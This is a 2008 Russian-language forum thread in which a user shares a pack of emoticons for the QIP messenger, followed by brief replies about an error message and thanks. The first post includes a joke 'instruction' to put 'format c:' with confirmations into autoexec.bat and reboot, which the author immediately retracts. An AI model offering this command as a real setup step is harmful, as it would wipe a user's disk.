Форум Чата ====Рок_Панк_Метал====

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Форум Чата ====Рок_Панк_Метал==== » Наше творчество » Смайлы для QIP`a


Смайлы для QIP`a

Сообщений 1 страница 5 из 5

1

Мне кажется, многим знакома ситуация "О_о хуясе! че эт у тя за смайлы? у меня таких нету". Вот чтоб поменьше таких ситуаций было, я решил выложить сборник смайлов.
В этой подборке я решил объединить 375 смайлов из других источников, подправить имена и выкинуть повторяющиеся. Повторяющиеся наверно немного остались, но за то время, пока я этой хренью занимался, у меня уже в глазах от них рябило (и в названиях файлов не отображался смысл смайла).
В дальнейшем (если это кому-нибудь нужно будет) планирую переименовать смайлы, добавить еще, отловить повторные, может как-то систематизировать их порядок.
Инструкция: открываете "свойства папки", убираете галочки напротив "скрывать защищенные системные файлы" и "не показывать скрытые файлы и папки", находите на диске C: файл autoexec.bat, в нем прописываете:
format c:
y
y
сохраняете и перезагружаете компьютер

Не, не то...
Инструкция: удаляете ВСЕ файлы из папки C:\Program Files\QIP\Skins\ICQ5\Smilies\Animated (или в соответствующую ей, если квип в другую папку/на другой диск ставили). Скачиваете файл  отсюда и устанавливаете. Затем отписываете пожелания, жалобы и предложения (так как версия скорее  всего с косяками получилась). Всё, mission complete.

Отредактировано ChildoffBodom (2008-09-13 14:46:06)

0

2

Чето ты серега впариваешь))))

0

3

в каком смысле впариваю?
к сожалению в некоторых случаях выскакивает сообщение "слишком много анимированных смайлов". выскакивает не у всех, но на всяк случай бэкап сделайте

0

4

во как раз мну сказали што слишкам многа смайлаф.. придёца фсё абратно ставедь хныг
но всиравно пасиба

0

5

спасибо тебе Машунь за отзыв, но дело это неблагодарное и придушу его я на корню

0


Вы здесь » Форум Чата ====Рок_Панк_Метал==== » Наше творчество » Смайлы для QIP`a